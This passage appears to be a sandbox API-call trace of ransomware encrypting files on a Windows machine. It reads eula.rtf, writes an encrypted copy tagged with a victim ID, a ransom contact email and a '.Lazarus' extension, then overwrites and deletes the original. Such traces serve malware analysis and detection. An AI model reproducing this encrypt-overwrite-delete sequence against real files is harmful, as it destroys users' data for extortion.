InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.699] AreFileApisANSI () returned 1 [0071.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0071.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0071.699] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.700] GetFileType (hFile=0x418) returned 0x1 [0071.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0071.700] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0071.700] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0071.700] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0071.700] CloseHandle (hObject=0x418) returned 1 [0071.700] AreFileApisANSI () returned 1 [0071.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0071.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0071.701] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.701] GetFileType (hFile=0x418) returned 0x1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0071.701] CloseHandle (hObject=0x418) returned 1 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.702] AreFileApisANSI () returned 1 [0071.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0071.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0071.702] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3)) returned 1 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0071.702] AreFileApisANSI () returned 1 [0071.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0071.702] GetLastError () returned 0x0 [0071.702] SetLastError (dwErrCode=0x0) [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0071.702] GetLastError () returned 0x0 [0071.702] SetLastError (dwErrCode=0x0) [0071.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0071.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0071.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0071.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.703] AreFileApisANSI () returned 1 [0071.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0071.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x80a30 [0071.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0071.703] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.705] GetFileType (hFile=0x418) returned 0x1 [0071.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0071.705] AreFileApisANSI () returned 1 [0071.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0071.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0071.705] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.706] GetFileType (hFile=0x410) returned 0x1 [0071.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0071.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.706] GetLastError () returned 0x0 [0071.706] SetLastError (dwErrCode=0x0) [0071.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.706] GetLastError () returned 0x0 [0071.706] SetLastError (dwErrCode=0x0) [0071.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0071.706] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0071.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0071.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0071.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0071.708] GetLastError () returned 0x0 [0071.708] SetLastError (dwErrCode=0x0) [0071.708] GetLastError () returned 0x0 [0071.708] SetLastError (dwErrCode=0x0) [0071.708] GetLastError () returned 0x0 [0071.709] SetLastError (dwErrCode=0x0) [0071.709] GetLastError () returned 0x0 [0071.709] SetLastError (dwErrCode=0x0) [0071.709] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x6c3, lpOverlapped=0x0) returned 1 [0071.797] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.798] GetLastError () returned 0x0 [0071.798] SetLastError (dwErrCode=0x0) [0071.798] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0071.799] GetLastError () returned 0x0 [0071.799] SetLastError (dwErrCode=0x0) [0071.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3) returned 0x7cfe0 [0071.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0071.799] GetLastError () returned 0x0 [0071.799] SetLastError (dwErrCode=0x0) [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0071.799] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x6d0, lpOverlapped=0x0) returned 1 [0071.799] GetLastError () returned 0x0 [0071.799] SetLastError (dwErrCode=0x0) [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.799] GetLastError () returned 0x0 [0071.799] SetLastError (dwErrCode=0x0) [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0071.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0071.800] CloseHandle (hObject=0x418) returned 1 [0071.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0071.801] CloseHandle (hObject=0x410) returned 1 [0071.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0071.801] AreFileApisANSI () returned 1 [0071.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0071.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0071.801] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.802] GetFileType (hFile=0x410) returned 0x1 [0071.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0071.802] GetLastError () returned 0xb7 [0071.802] SetLastError (dwErrCode=0xb7) [0071.802] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0071.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0071.803] CloseHandle (hObject=0x410) returned 1 [0071.803] AreFileApisANSI () returned 1 [0071.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0071.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0071.804] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.805] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.806] AreFileApisANSI () returned 1 [0071.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0071.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0071.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | 